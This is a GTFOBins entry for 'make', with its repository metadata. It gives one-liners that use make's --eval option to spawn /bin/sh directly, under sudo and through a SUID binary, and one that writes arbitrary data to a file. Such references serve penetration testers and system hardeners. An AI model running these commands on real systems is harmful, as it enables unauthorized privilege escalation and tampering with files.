Files
GTFOBins.github.io/_gtfobins/make.md
Andrea Cardaci c31a8a1b6b Simplify make
2018-06-04 18:28:58 +02:00

438 B

functions
functions
execute-interactive sudo-enabled suid-enabled file-write
code
COMMAND='/bin/sh' make -s --eval=$'x:\n\t-'"$COMMAND"
code
COMMAND='/bin/sh' sudo make -s --eval=$'x:\n\t-'"$COMMAND"
code
COMMAND='/bin/sh' ./make -s --eval=$'x:\n\t-'"$COMMAND"
code
LFILE=file_to_write make -s --eval="$(file >$LFILE,data)" .